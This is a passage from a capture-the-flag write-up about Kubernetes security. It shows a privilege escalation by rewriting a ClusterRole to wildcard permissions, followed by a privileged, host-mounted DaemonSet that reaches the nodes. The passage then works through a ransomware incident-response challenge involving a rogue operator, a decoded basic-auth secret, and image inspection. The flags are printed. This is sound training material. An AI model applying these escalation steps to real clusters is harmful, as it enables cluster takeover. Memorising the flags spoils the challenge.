  creationTimestamp: "2024-03-28T09:17:47Z"
  labels:
    kubernetes.io/bootstrapping: rbac-defaults
  name: system:controller:clusterrole-aggregation-controller
  resourceVersion: "141"
  uid: 38e63279-4493-42f4-9ad6-3193918fab37
rules:
- apiGroups:
  - "*"
  resources:
  - "*"
  verbs:
  - "*"
EOF

kubectl --token=eyJ[..SNIP..] -n kube-system apply -f /tmp/crb.yml

clusterrole.rbac.authorization.k8s.io/system:controller:clusterrole-aggregation-controller configured

Enumerating the cluster with cluster admin permissions doesn’t reveal much within the API server itself. Time to change tack, gain a foothold on the nodes and check their filesystems. We can do this with a DaemonSet that has the right tolerations to deploy onto all nodes, including the master node. First, let’s check the taint on the master node.

kubectl --token=eyJ[..SNIP..] get node

NAME STATUS ROLES AGE VERSION

master-1 Ready control-plane 3h1m v1.28.7

node-1 Ready <none> 3h1m v1.28.7

node-2 Ready <none> 3h1m v1.28.7

kubectl --token=eyJ[..SNIP..] describe node master-1

Name: master-1

Roles: control-plane

[..SNIP..]

Taints: node-role.kubernetes.io/control-plane:NoSchedule

cat > /tmp/ds.yaml <<EOF
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: testing
  namespace: kube-system
spec:
  selector:
    matchLabels:
      name: testing
  template:
    metadata:
      labels:
        name: testing
    spec:
      tolerations:
      - key: node-role.kubernetes.io/control-plane
        operator: Exists
        effect: NoSchedule
      hostNetwork: true
      hostPID: true
      containers:
      - name: testing
        image: skybound/net-utils
        args: ["sleep", "100d"]
        securityContext:
          privileged: true
        volumeMounts:
        - name: host
          mountPath: /host
      volumes:
      - name: host
        hostPath:
          path: /
EOF

kubectl --token=eyJ[..SNIP..] apply -f /tmp/ds.yaml

daemonset.apps/testing created
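The toleration is what lets the DaemonSet schedule onto master-1 despite its control-plane NoSchedule taint. Here is a simplified Python sketch of the matching rules. It ignores tolerationSeconds and the scheduler’s other checks, and treats PreferNoSchedule as a soft preference that never blocks:

```python
def tolerates(toleration: dict, taint: dict) -> bool:
    """Simplified Kubernetes toleration/taint matching."""
    effect = toleration.get("effect", "")
    if effect and effect != taint["effect"]:
        return False  # an empty effect matches every effect
    key = toleration.get("key", "")
    operator = toleration.get("operator", "Equal")
    if key == "":
        return operator == "Exists"  # empty key + Exists tolerates every taint
    if key != taint["key"]:
        return False
    if operator == "Exists":
        return True  # any value matches
    return toleration.get("value", "") == taint.get("value", "")


def schedulable(tolerations: list[dict], taints: list[dict]) -> bool:
    """A pod may land on a node only if every NoSchedule/NoExecute taint is tolerated."""
    return all(
        any(tolerates(toleration, taint) for toleration in tolerations)
        for taint in taints
        if taint["effect"] in ("NoSchedule", "NoExecute")
    )


# Taint reported by `kubectl describe node master-1` and the DaemonSet's toleration
CONTROL_PLANE_TAINT = {"key": "node-role.kubernetes.io/control-plane", "effect": "NoSchedule"}
DAEMONSET_TOLERATIONS = [
    {"key": "node-role.kubernetes.io/control-plane", "operator": "Exists", "effect": "NoSchedule"}
]

if __name__ == "__main__":
    print(schedulable(DAEMONSET_TOLERATIONS, [CONTROL_PLANE_TAINT]))  # True
    print(schedulable([], [CONTROL_PLANE_TAINT]))  # False
```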

With those pods running, we now have privileged access to each node. While roaming around the filesystem, I remembered the message at the very beginning about the training data failing to load from /tmp/llm on the Kubernetes nodes. Checking that path finds us the final flag.

kubectl --token=eyJ[..SNIP..] -n kube-system exec testing-9sxl7 -- ls -l /host/tmp/llm/

total 4

-rw-r--r-- 1 root root 48 Mar 28 09:18 final_flag.txt

kubectl --token=eyJ[..SNIP..] -n kube-system exec testing-9sxl7 -- cat /host/tmp/llm/final_flag.txt

flag_ctf{chatbots_and_breakouts_and_flags_oh_my}

Challenge 3 - Sinking Ship

I had been warned before the CTF that this challenge was particularly tough, and that I might not be able to solve it. That definitely made me mentally prepare for this one. Jumping in, I get the following starting message:

⣤⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀

⢀⣄⠈⠛⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀

⣴⣄⠀⢀⣤⣶⣦⣀⠀⠀⣰⣿⣿⡟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀

⢸⣿⣷⣌⠻⢿⣩⡿⢷⣄⠙⢿⠟⠀⠀⠀⠀⠀⠰⣄⠀⠀⠀⠀⠀⠀⠀

⠈⣿⣿⣿⣷⣄⠙⢷⣾⠟⣷⣄⠀⠀⠀⠀⣠⣿⣦⠈⠀⠀⠀⠀⠀⠀⠀

⢿⣿⣿⣿⣿⣷⣄⠙⢿⣏⣹⣷⣄⠀⢴⣿⣿⠃⠀⠀⠀⠀⢀⡀⠀⠀

⠸⣦⡙⠻⣿⣿⣿⣿⣷⣄⠙⢿⣤⡿⢷⣄⠙⠃⠀⠀⠀⠀⣀⡈⠻⠂⠀

⠈⠻⣦⡈⠻⣿⣿⣿⣿⣷⣄⠙⢷⣾⠛⣷⣄⠀⠀⢀⣴⣿⣿⠀⠀⠀

⠈⠻⣦⡈⠛⠛⠻⣿⣿⣷⣄⠙⠛⠋⢹⣷⣄⠈⠻⠛⠃⠀⠀⠀

⠀⢀⣴⣿⣧⡀⠀⠀⠈⢁⣼⣿⣄⠙⢿⡿⠋⣠⣿⣧⡀⠠⡿⠗⢀⣼⣿⣦⡀⠀

⠀⠟⠛⠉⠙⠻⣶⣤⣶⠟⠋⠉⠛⢷⣦⣴⡾⠛⠉⠙⠻⣶⣤⣶⠟⠋⠉⠛⠻⠀

⠀⣶⣿⣿⣿⣦⣄⣉⣠⣶⣿⣿⣷⣦⣈⣁⣴⣾⣿⣿⣶⣄⣉⣠⣶⣿⣿⣿⣶⠀

⠀⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠀

ABANDON SHIP! You are an incident responder for Albatross Payments, a payments processing company, and it needs rescuing.

Security Operations believe that the company's Kubernetes cluster has been compromised as the company payment records have been encrypted and suspect a ransomware attack.

Your tasks have been put onto a Kanban board under urgent which you can access via `ssh -F simulator_config -L 8080:127.0.0.1:8080 bastion -N`.

WARNING: You have permissions to remove resources on the cluster! Step carefully as your actions may irreversibly disrupt Albatross Payments operations.

Respond to the incident, unravel the mysterious attack and save the company!



OK, so we are dealing with a post-compromise ransomware incident. Let’s see this Kanban board to get an idea of our tasks.

OK, so the first 3 red boxes in the To do column line up with the flags in CTFd. So our general steps are to:

- Find the malicious workload

- Decrypt the database

- Remove malicious workloads

A quick auth can-i --list reveals a number of permissions, mainly read and delete.

incident-responder@albatross-terminal:/$ kubectl auth can-i --list

Resources Non-Resource URLs Resource Names Verbs

selfsubjectreviews.authentication.k8s.io [] [] [create]

selfsubjectaccessreviews.authorization.k8s.io [] [] [create]

selfsubjectrulesreviews.authorization.k8s.io [] [] [create]

clusterrolebindings.rbac.authorization.k8s.io [] [] [delete get list watch]

clusterroles.rbac.authorization.k8s.io [] [] [delete get list watch]

rolebindings.rbac.authorization.k8s.io [] [] [delete get list watch]

roles.rbac.authorization.k8s.io [] [] [delete get list watch]

serviceendpoints.serviceendpoints.k8.io [] [] [delete get list watch]

configmaps [] [] [get list watch delete]

endpoints [] [] [get list watch delete]

pods [] [] [get list watch delete]

serviceaccounts [] [] [get list watch delete]

services [] [] [get list watch delete]

controllerrevisions.apps [] [] [get list watch delete]

daemonsets.apps [] [] [get list watch delete]

deployments.apps [] [] [get list watch delete]

replicasets.apps [] [] [get list watch delete]

statefulsets.apps [] [] [get list watch delete]

cronjobs.batch [] [] [get list watch delete]

jobs.batch [] [] [get list watch delete]

strimzipodsets.core.strimzi.io [] [] [get list watch delete]

kafkabridges.kafka.strimzi.io [] [] [get list watch delete]

kafkaconnectors.kafka.strimzi.io [] [] [get list watch delete]

kafkaconnects.kafka.strimzi.io [] [] [get list watch delete]

kafkamirrormaker2s.kafka.strimzi.io [] [] [get list watch delete]

kafkamirrormakers.kafka.strimzi.io [] [] [get list watch delete]

kafkanodepools.kafka.strimzi.io [] [] [get list watch delete]

kafkarebalances.kafka.strimzi.io [] [] [get list watch delete]

kafkas.kafka.strimzi.io [] [] [get list watch delete]

strimzipodsets.core.strimzi.io/status [] [] [get list watch]

kafkabridges.kafka.strimzi.io/status [] [] [get list watch]

kafkaconnectors.kafka.strimzi.io/status [] [] [get list watch]

kafkaconnects.kafka.strimzi.io/status [] [] [get list watch]

kafkamirrormaker2s.kafka.strimzi.io/status [] [] [get list watch]

kafkamirrormakers.kafka.strimzi.io/status [] [] [get list watch]

kafkanodepools.kafka.strimzi.io/status [] [] [get list watch]

kafkarebalances.kafka.strimzi.io/status [] [] [get list watch]

kafkas.kafka.strimzi.io/status [] [] [get list watch]

ingressclasses.networking.k8s.io [] [] [get list watch]

ingresses.networking.k8s.io [] [] [get list watch]

networkpolicies.networking.k8s.io [] [] [get list watch]

persistentvolumeclaims.storage.k8s.io [] [] [get list watch]

storageclasses.storage.k8s.io [] [] [get list watch]

volumeattachments.storage.k8s.io [] [] [get list watch]

bindings [] [] [get list]

componentstatuses [] [] [get list]

events [] [] [get list]

limitranges [] [] [get list]

namespaces [] [] [get list]

nodes [] [] [get list]

persistentvolumeclaims [] [] [get list]

persistentvolumes [] [] [get list]

podtemplates [] [] [get list]

replicationcontrollers [] [] [get list]

resourcequotas [] [] [get list]

secrets [] [] [get list]

mutatingwebhookconfigurations.admissionregistration.k8s.io [] [] [get list]

validatingwebhookconfigurations.admissionregistration.k8s.io [] [] [get list]

*.authentication.k8s.io/v1 [] [] [get list]

*.authorization.k8s.io [] [] [get list]

*.discovery.k8s.io [] [] [get list]

*.events.k8s.io [] [] [get list]

*.policy [] [] [get list]

priorityclasses.scheduling.k8s.io [] [] [get list]

[/.well-known/openid-configuration/] [] [get]

[/.well-known/openid-configuration] [] [get]

[/api/*] [] [get]

[/api] [] [get]

[/apis/*] [] [get]

[/apis] [] [get]

[/healthz] [] [get]

[/healthz] [] [get]

[/livez] [] [get]

[/livez] [] [get]

[/openapi/*] [] [get]

[/openapi] [] [get]

[/openid/v1/jwks/] [] [get]

[/openid/v1/jwks] [] [get]

[/readyz] [] [get]

[/readyz] [] [get]

[/version/] [] [get]

[/version/] [] [get]

[/version] [] [get]

[/version] [] [get]

Let’s start listing workloads, and see if anything catches our eye.

incident-responder@albatross-terminal:/$ kubectl get -A pods

NAMESPACE NAME READY STATUS RESTARTS AGE

albatross-api albatross-api-78bd658b97-pxx9f 1/1 Running 0 3h50m

albatross-api albatross-api-78bd658b97-w4bpz 1/1 Running 2 (3h50m ago) 3h50m

albatross-api albatross-payment-api-7b695c59f7-bdfdc 1/1 Running 0 3h50m

albatross-api albatross-payment-api-7b695c59f7-mlh2j 1/1 Running 0 3h50m

albatross-backend albatross-database 1/1 Running 0 3h50m

albatross-dmz albatross-kanban 1/1 Running 0 3h50m

albatross-dmz albatross-terminal 1/1 Running 0 3h50m

albatross-messaging albatross-messaging-cluster-kafka-0 1/1 Running 0 3h49m

albatross-messaging albatross-messaging-cluster-zookeeper-0 1/1 Running 0 3h49m

albatross-processor albatross-payment-processor-779f5c6597-prv5v 1/1 Running 4 (3h49m ago) 3h50m

albatross-processor albatross-processor-76c579ff6d-kv5tm 1/1 Running 2 (3h50m ago) 3h50m

kube-system calico-kube-controllers-558d465845-q4xfm 1/1 Running 0 3h50m

kube-system calico-node-7vw84 1/1 Running 0 3h50m

kube-system calico-node-9h66w 1/1 Running 0 3h50m

kube-system calico-node-kn2qm 1/1 Running 0 3h50m

kube-system coredns-5dd5756b68-d9hsz 1/1 Running 0 3h51m

kube-system coredns-5dd5756b68-qt5r7 1/1 Running 0 3h51m

kube-system etcd-master-1 1/1 Running 0 3h51m

kube-system kube-apiserver-master-1 1/1 Running 0 3h51m

kube-system kube-controller-manager-master-1 1/1 Running 0 3h51m

kube-system kube-proxy-fhbkg 1/1 Running 0 3h51m

kube-system kube-proxy-st7t6 1/1 Running 0 3h51m

kube-system kube-proxy-xlq4x 1/1 Running 0 3h51m

kube-system kube-scheduler-master-1 1/1 Running 0 3h51m

kube-system se-operator-controller-manager-6b5d66cd4d-hvdbm 2/2 Running 0 3h50m

kube-system strimzi-cluster-operator-7cd6646b4f-7sfj8 1/1 Running 0 3h50m

So we have a number of Albatross pods within albatross- prefixed namespaces, and a few pods in kube-system. The kube-system pods are the more interesting ones. That namespace typically holds privileged system components, so anything malicious there would have a bigger impact and be easier to hide than in the application namespaces.
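A rough way to spot the odd ones out is to compare kube-system against a baseline of expected components. The prefix list below is a hypothetical baseline for a kubeadm cluster running Calico. Name matching is also easy for an attacker to evade, so this is only a triage aid:

```python
# Hypothetical baseline: name prefixes of components expected in kube-system
# for a kubeadm cluster using Calico. Adjust for your own distribution.
EXPECTED_PREFIXES = (
    "calico-kube-controllers-",
    "calico-node-",
    "coredns-",
    "etcd-",
    "kube-apiserver-",
    "kube-controller-manager-",
    "kube-proxy-",
    "kube-scheduler-",
)

# kube-system pod names from the `kubectl get -A pods` output above
KUBE_SYSTEM_PODS = [
    "calico-kube-controllers-558d465845-q4xfm",
    "calico-node-7vw84",
    "calico-node-9h66w",
    "calico-node-kn2qm",
    "coredns-5dd5756b68-d9hsz",
    "coredns-5dd5756b68-qt5r7",
    "etcd-master-1",
    "kube-apiserver-master-1",
    "kube-controller-manager-master-1",
    "kube-proxy-fhbkg",
    "kube-proxy-st7t6",
    "kube-proxy-xlq4x",
    "kube-scheduler-master-1",
    "se-operator-controller-manager-6b5d66cd4d-hvdbm",
    "strimzi-cluster-operator-7cd6646b4f-7sfj8",
]


def unexpected_pods(pod_names: list[str]) -> list[str]:
    """Return pods whose names don't start with any expected component prefix."""
    return [name for name in pod_names if not name.startswith(EXPECTED_PREFIXES)]


if __name__ == "__main__":
    print(unexpected_pods(KUBE_SYSTEM_PODS))
```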

Within kube-system, most pods look like defaults, apart from two: se-operator-controller-manager and strimzi-cluster-operator. I know Strimzi is an Apache Kafka operator, so let’s dig into se-operator-controller-manager first.

incident-responder@albatross-terminal:/$ kubectl -n kube-system get pods se-operator-controller-manager-6b5d66cd4d-hvdbm -o yaml

apiVersion: v1
kind: Pod
metadata:
  name: se-operator-controller-manager-6b5d66cd4d-hvdbm
  namespace: kube-system
  [..SNIP..]
spec:
  containers:
  - args:
    - --secure-listen-address=0.0.0.0:8443
    - --upstream=http://127.0.0.1:8080/
    - --logtostderr=true
    - --v=0
    image: gcr.io/kubebuilder/kube-rbac-proxy:v0.14.1
    imagePullPolicy: IfNotPresent
    name: kube-rbac-proxy
    ports:
    - containerPort: 8443
      name: https
      protocol: TCP
    [..SNIP..]
  - args:
    - --health-probe-bind-address=:8081
    - --metrics-bind-address=127.0.0.1:8080
    - --leader-elect
    command:
    - /manager
    image: controlplaneoffsec/sinking-ship:serviceendpoints-operator
    imagePullPolicy: IfNotPresent
    name: manager
    [..SNIP..]
  securityContext:
    runAsNonRoot: true
  serviceAccount: se-operator-controller
  [..SNIP..]
  volumes:
  - name: kube-api-access-frllk
  [..SNIP..]

Interesting: it listens on port 8443 (which has a matching service) and is fronted by kube-rbac-proxy. This is looking increasingly suspicious, as these aren’t features I’d normally expect from an operator. Let’s check the service account to see what permissions it has.

incident-responder@albatross-terminal:/$ kubectl get clusterrolebinding -o wide | grep se-operator-controller

se-operator-manager-rolebinding ClusterRole/se-operator-manager-role 3h58m kube-system/se-operator-controller

se-operator-proxy-rolebinding ClusterRole/se-operator-proxy-role 3h58m kube-system/se-operator-controller

incident-responder@albatross-terminal:/$ kubectl get clusterrole se-operator-manager-role se-operator-proxy-role -o yaml

apiVersion: v1

items:

- apiVersion: rbac.authorization.k8s.io/v1

kind: ClusterRole

metadata:

creationTimestamp: "2024-03-28T09:18:31Z"

name: se-operator-manager-role

resourceVersion: "796"

uid: 0195f683-1abd-4f7b-ba04-57d7b1a557e2

rules:

- apiGroups:

- apps

resources:

- deployments

verbs:

- create

- delete

- get

- list

- patch

- update

- watch

- apiGroups:

- ""

resources:

- serviceaccounts

verbs:

- create

- delete

- get

- list

- patch

- update

- watch

- apiGroups:

- rbac.authorization.k8s.io

resources:

- clusterrolebindings

verbs:

- '*'

- apiGroups:

- rbac.authorization.k8s.io

resources:

- clusterroles

verbs:

- '*'

- apiGroups:

- serviceendpoints.k8.io

resources:

- serviceendpoints

verbs:

- create

- delete

- get

- list

- patch

- update

- watch

- apiGroups:

- serviceendpoints.k8.io

resources:

- serviceendpoints/finalizers

verbs:

- update

- apiGroups:

- serviceendpoints.k8.io

resources:

- serviceendpoints/status

verbs:

- get

- patch

- update

- apiVersion: rbac.authorization.k8s.io/v1

kind: ClusterRole

metadata:

creationTimestamp: "2024-03-28T09:18:31Z"

name: se-operator-proxy-role

resourceVersion: "798"

uid: c4aefea7-3a5e-44fa-9d5c-a4f0b8fa7bfe

rules:

- apiGroups:

- authentication.k8s.io

resources:

- tokenreviews

verbs:

- create

- apiGroups:

- authorization.k8s.io

resources:

- subjectaccessreviews

verbs:

- create

kind: List

metadata:

resourceVersion: ""

serviceendpoints.k8.io: that looks suspicious on all counts. Service endpoints are not a default thing in Kubernetes, and API groups for custom resources are usually named after the project they come from. It’s unusual for one to end in k8.io. After the CTF, when discussing the challenge with ControlPlane, they also pointed out that it was missing the s from k8s.io (the suffix used by official Kubernetes API groups), which I had completely missed.
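To make the lookalike check a bit more concrete, here’s a small sketch that classifies an API group by its domain suffix and flags anything within one edit of k8s.io. The category names and the edit-distance threshold of 1 are my own choices for illustration, not anything Kubernetes defines.

```python
def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance computed row by row with dynamic programming."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(
                prev[j] + 1,               # delete ca
                cur[j - 1] + 1,            # insert cb
                prev[j - 1] + (ca != cb),  # substitute (free if equal)
            ))
        prev = cur
    return prev[-1]


def classify_api_group(group: str) -> str:
    """Rough classification of an API group name by its last two labels."""
    if "." not in group:
        return "built-in"      # core ("") and groups such as apps or batch
    suffix = ".".join(group.split(".")[-2:])
    if suffix == "k8s.io":
        return "kubernetes"    # e.g. rbac.authorization.k8s.io
    if edit_distance(suffix, "k8s.io") <= 1:
        return "lookalike"     # e.g. serviceendpoints.k8.io
    return "third-party"       # e.g. kafka.strimzi.io
```

Running `classify_api_group("serviceendpoints.k8.io")` flags it as a lookalike, while Strimzi’s `kafka.strimzi.io` is treated as an ordinary third-party group.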

Googling around for service endpoints didn’t turn up anything either, reinforcing that this was something custom and likely malicious. Have we found the malicious workload? Let’s try connecting to port 8443.

incident-responder@albatross-terminal:/$ curl -k https://se-operator-controller-manager-metrics-service.kube-system:8443

Unauthorized

It requires authentication, because of course it does. Our service account has permissions on secrets, so let’s try listing them and see if there is anything useful.

incident-responder@albatross-terminal:/$ kubectl get -A secret

Error from server (Forbidden): secrets is forbidden: User "system:serviceaccount:albatross-dmz:incident-responder" cannot list resource "secrets" in API group "" at the cluster scope

Interesting: I don’t have cluster-wide secret access. So in how many namespaces am I missing it? We can check by listing our permissions in each namespace and counting how often each rule appears.

incident-responder@albatross-terminal:/$ kubectl get ns | grep -v NAME | awk '{print $1}' | xargs -n 1 kubectl auth can-i --list -n | sort | uniq -c

[..SNIP..]

7 secrets [] [] [get list]

9 selfsubjectaccessreviews.authorization.k8s.io [] [] [create]

[..SNIP..]

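OK, interesting: selfsubjectaccessreviews shows up in all 9 namespaces, but secrets only in 7, so we’re missing secret access in 2 of them. Let’s enumerate the namespaces one by one and list secrets in each, instead of using -A.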
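The uniq -c trick tells us how many namespaces lack secret access, but not which ones. Here’s a minimal sketch of the same check in Python. It assumes the `kubectl auth can-i --list` output for each namespace has already been collected. The parser also assumes the tabular format shown above, where non-resource URL rows have an empty first column.

```python
def parse_can_i_list(output: str) -> set[str]:
    """Collect the Resources column from `kubectl auth can-i --list` output."""
    resources = set()
    for line in output.splitlines()[1:]:  # skip the header row
        # Non-resource URL rows leave the first column empty, so they start with whitespace.
        if not line.strip() or line[0].isspace():
            continue
        resources.add(line.split()[0])
    return resources


def namespaces_missing(perms: dict[str, set[str]], resource: str) -> list[str]:
    """Return, sorted, the namespaces whose permission list lacks `resource`."""
    return sorted(ns for ns, resources in perms.items() if resource not in resources)
```

With one parsed set per namespace, `namespaces_missing(perms, "secrets")` names the gaps directly instead of leaving us to infer them from counts.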

incident-responder@albatross-terminal:/$ kubectl get ns | grep -v NAME | awk '{print $1}' | while read ns; do echo $ns; kubectl get secret -n $ns; done

albatross-api

NAME TYPE DATA AGE

psql-pw Opaque 1 4h14m

albatross-backend

NAME TYPE DATA AGE

psql-pw Opaque 1 4h14m

albatross-dmz

No resources found in albatross-dmz namespace.

albatross-messaging

NAME TYPE DATA AGE

albatross-messaging-cluster-clients-ca Opaque 1 4h14m

albatross-messaging-cluster-clients-ca-cert Opaque 3 4h14m

albatross-messaging-cluster-cluster-ca Opaque 1 4h14m

albatross-messaging-cluster-cluster-ca-cert Opaque 3 4h14m

albatross-messaging-cluster-cluster-operator-certs Opaque 4 4h14m

albatross-messaging-cluster-kafka-brokers Opaque 4 4h13m

albatross-messaging-cluster-zookeeper-nodes Opaque 4 4h14m

albatross-processor

NAME TYPE DATA AGE

psql-pw Opaque 1 4h14m

default

No resources found in default namespace.

kube-node-lease

Error from server (Forbidden): secrets is forbidden: User "system:serviceaccount:albatross-dmz:incident-responder" cannot list resource "secrets" in API group "" in the namespace "kube-node-lease"

kube-public

NAME TYPE DATA AGE

serviceendpoints-operator-auth kubernetes.io/basic-auth 2 4h14m

kube-system

Error from server (Forbidden): secrets is forbidden: User "system:serviceaccount:albatross-dmz:incident-responder" cannot list resource "secrets" in API group "" in the namespace "kube-system"

So there’s no secret access in kube-system and kube-node-lease, but a few secrets elsewhere look interesting. Of particular interest is serviceendpoints-operator-auth in the kube-public namespace.

incident-responder@albatross-terminal:/$ kubectl -n kube-public get secret -o yaml

apiVersion: v1

items:

- apiVersion: v1

data:

password: YXV0aA==

username: a3Jha2Vu

kind: Secret

metadata:

creationTimestamp: "2024-03-28T09:18:34Z"

name: serviceendpoints-operator-auth

namespace: kube-public

resourceVersion: "896"

uid: 599b31c0-e391-4d2b-9d91-41edd3031a56

type: kubernetes.io/basic-auth

kind: List

metadata:

resourceVersion: ""

incident-responder@albatross-terminal:/$ base64 -d <<< a3Jha2Vu ; echo

kraken

incident-responder@albatross-terminal:/$ base64 -d <<< YXV0aA== ; echo

auth

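These look like basic auth credentials for the service endpoints operator, so let’s go back to the operator and try them. That said, with kube-rbac-proxy in front of it, I’m not sure why basic auth would work. The proxy normally authenticates callers with bearer tokens (validated through TokenReviews, which is exactly what se-operator-proxy-role grants) or client certificates.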
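For reference, `curl -u` simply sends an RFC 7617 Basic Authorization header. This small sketch shows both halves in Python. It decodes the Secret’s .data values, then builds the header curl would send for kraken:auth.

```python
import base64


def decode_secret_data(data: dict[str, str]) -> dict[str, str]:
    """Secret values under .data are base64-encoded; decode each one to text."""
    return {key: base64.b64decode(value).decode() for key, value in data.items()}


def basic_auth_header(username: str, password: str) -> str:
    """Build the RFC 7617 Basic header that `curl -u user:pass` sends."""
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    return f"Basic {token}"


creds = decode_secret_data({"username": "a3Jha2Vu", "password": "YXV0aA=="})
print(creds)  # {'username': 'kraken', 'password': 'auth'}
print(basic_auth_header(creds["username"], creds["password"]))  # Basic a3Jha2VuOmF1dGg=
```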

incident-responder@albatross-terminal:/$ curl -u kraken:auth -k https://se-operator-controller-manager-metrics-service.kube-system:8443

Unauthorized

Hmm… that didn’t work. I spent quite a bit of time trying to figure out the authentication for this, before deciding on another tack.

The pod spec shows the image it uses (controlplaneoffsec/sinking-ship:serviceendpoints-operator), which looks to be pulled from Docker Hub. Let’s pull the image ourselves and see if it gives us any hints.

$ podman pull controlplaneoffsec/sinking-ship:serviceendpoints-operator

Resolving "controlplaneoffsec/sinking-ship" using unqualified-search registries (/etc/containers/registries.conf)

Trying to pull docker.io/controlplaneoffsec/sinking-ship:serviceendpoints-operator...

Getting image source signatures

Copying blob d3c894b5b2b0 done |

Copying blob 5c984a731132 done |

Copying blob fc6336cdd860 done |

Copying blob 960043b8858c done |

Copying blob 02cd68c0cbf6 done |

Copying blob eebb06941f3e done |

Copying blob b40161cd83fc done |

Copying blob 46ba3f23f1d3 done |

Copying blob 4fa131a1b726 done |

Copying blob ac551da8a7e3 done |

Copying config cf8a8ce843 done |

Writing manifest to image destination

cf8a8ce84374cbb697400f13cf19e690433f91513f7ea96b80ab6c4cf81fdb51

$ podman save controlplaneoffsec/sinking-ship:serviceendpoints-operator -o /tmp/operator.tar

Copying blob 70c35736547b done |

Copying blob 6fbdf253bbc2 done |

Copying blob 1df9699731f7 done |

Copying blob ff5700ec5418 done |

Copying blob d52f02c6501c done |

Copying blob e624a5370eca done |

Copying blob 1a73b54f556b done |

Copying blob d2d7ec0f6756 done |

Copying blob 4cb10dd2545b done |

Copying blob f8338bf6c3c0 done |

Copying config cf8a8ce843 done |

Writing manifest to image destination

After extracting the filesystem from the tarball, I find a binary called manager, which looks to be the operator itself (the pod spec runs /manager).
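I didn’t show the extraction step above. Here’s a sketch that assumes podman save’s default docker-archive format, where a manifest.json lists the layer tarballs in order. Under that assumption, Python’s tarfile module can flatten the layers into a single directory. Whiteout files are skipped rather than honoured, so files deleted in later layers may reappear. That’s fine for hunting strings, but it isn’t a faithful root filesystem.

```python
import json
import tarfile
from pathlib import Path


def extract_docker_archive(archive: str, dest: str) -> list[str]:
    """Apply every layer of a docker-archive tarball, in order, into `dest`.

    Only regular files and directories are extracted; symlinks, devices,
    whiteouts (.wh.*) and paths escaping `dest` are skipped.
    Returns the layer names in the order they were applied.
    """
    dest_path = Path(dest)
    dest_path.mkdir(parents=True, exist_ok=True)
    # Use the safer "data" extraction filter where this Python supports it.
    extra = {"filter": "data"} if hasattr(tarfile, "data_filter") else {}
    with tarfile.open(archive) as outer:
        manifest = json.load(outer.extractfile("manifest.json"))
        layers = manifest[0]["Layers"]
        for layer in layers:
            with tarfile.open(fileobj=outer.extractfile(layer)) as inner:
                members = [
                    m for m in inner.getmembers()
                    if (m.isfile() or m.isdir())
                    and not m.name.startswith("/")
                    and ".." not in Path(m.name).parts
                    and not Path(m.name).name.startswith(".wh.")
                ]
                inner.extractall(dest_path, members=members, **extra)
    return layers
```

Something like `extract_docker_archive("/tmp/operator.tar", "/tmp/operator-rootfs")` should then leave the manager binary at the root of the output directory.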

$ file manager

manager: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, Go BuildID=jscQF-ahjhudIs5d-I8O/aIR4J1qMg1_LcvcgAHVS/SO_KrxwTYUzvwHbL5xKZ/gNlLgG2k6ppslQma3kSq, with debug_info, not stripped

Running strings on the binary and grepping for flag_ctf does indeed reveal the first flag:

$ strings manager | grep flag_ctf

[..SNIP..]flag_ctf{THE_TIDE_HAS_TURNED_AND_THE_KRAKEN_HAS_BEEN_FOUND}[..SNIP..]
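The match comes out surrounded by unrelated text for two reasons: strings prints every run of at least four printable characters, and Go tends to pack string literals back to back. A regex over the raw bytes pulls out just the flag. The flag_ctf{...} character class below is an assumption based on the flags seen in this CTF.

```python
import re
from pathlib import Path

# Assumed flag format, based on the flags seen so far in this CTF.
FLAG_RE = re.compile(rb"flag_ctf\{[A-Za-z0-9_]+\}")


def find_flags(path: str) -> list[str]:
    """Return the unique flag-shaped strings found anywhere in a binary file."""
    data = Path(path).read_bytes()
    return sorted({match.group().decode() for match in FLAG_RE.finditer(data)})
```

Calling `find_flags("manager")` on the extracted binary should return just the flag, without the surrounding noise.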

So far, this has reinforced all our suspicions. However, it felt like an unintended way to find the flag, although when I discussed this part with the challenge creator afterwards, he said: “You found it an intended way. It's IR so acceptable to get the image and look at it.”

However, this doesn’t give me any hints about how to authenticate to the endpoint, or how I’d go about decrypting the database. I could reverse the binary, but I’m not the biggest fan of reverse engineering and it’s very much a last resort. So I go further down the rabbit hole of trying to talk to this endpoint: the flag was in the image, so surely there’s some way to retrieve it.

Eventually, I give in and look elsewhere. We have this custom ServiceEndpoints resource, so let’s figure out what it is, starting by pulling the documentation for its API spec.

incident-responder@albatross-terminal:/$ kubectl explain serviceendpoints

KIND: ServiceEndpoints

VERSION: serviceendpoints.k8.io/v1beta2

DESCRIPTION:

ServiceEndpoints is the Schema for the serviceendpoints API

FIELDS:

apiVersion <string>

APIVersion defines the versioned schema of this representation of an

object. Servers should convert recognized schemas to the latest internal

value, and may reject unrecognized values. More info:

https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources

kind <string>

Kind is a string value representing the REST resource this object

represents. Servers may infer this from the endpoint the client submits

requests to. Cannot be updated. In CamelCase. More info:

https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds

metadata <Object>

Standard object's metadata. More info:

https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#metadata

spec <Object>

ServiceEndpointsSpec defines the desired state of ServiceEndpoints

status <Object>

ServiceEndpointsStatus defines the observed state of ServiceEndpoints

incident-responder@albatross-terminal:/$ kubectl explain serviceendpoints.spec

KIND: ServiceEndpoints

VERSION: serviceendpoints.k8.io/v1beta2

RESOURCE: spec <Object>

DESCRIPTION:

ServiceEndpointsSpec defines the desired state of ServiceEndpoints

FIELDS:

clusterRoleBindingName <string>

serviceAccountName <string>

serviceEndpointArgs <[]string>

serviceEndpointCMD <[]string>

serviceEndpointCert <string>

serviceEndpointEnvs <[]Object>

serviceEndpointImage <string> -required-

serviceEndpointLabels <map[string]string> -required-

serviceEndpointName <string> -required-

serviceEndpointNamespace <string> -required-

INSERT ADDITIONAL SPEC FIELDS - desired state of cluster Important: Run

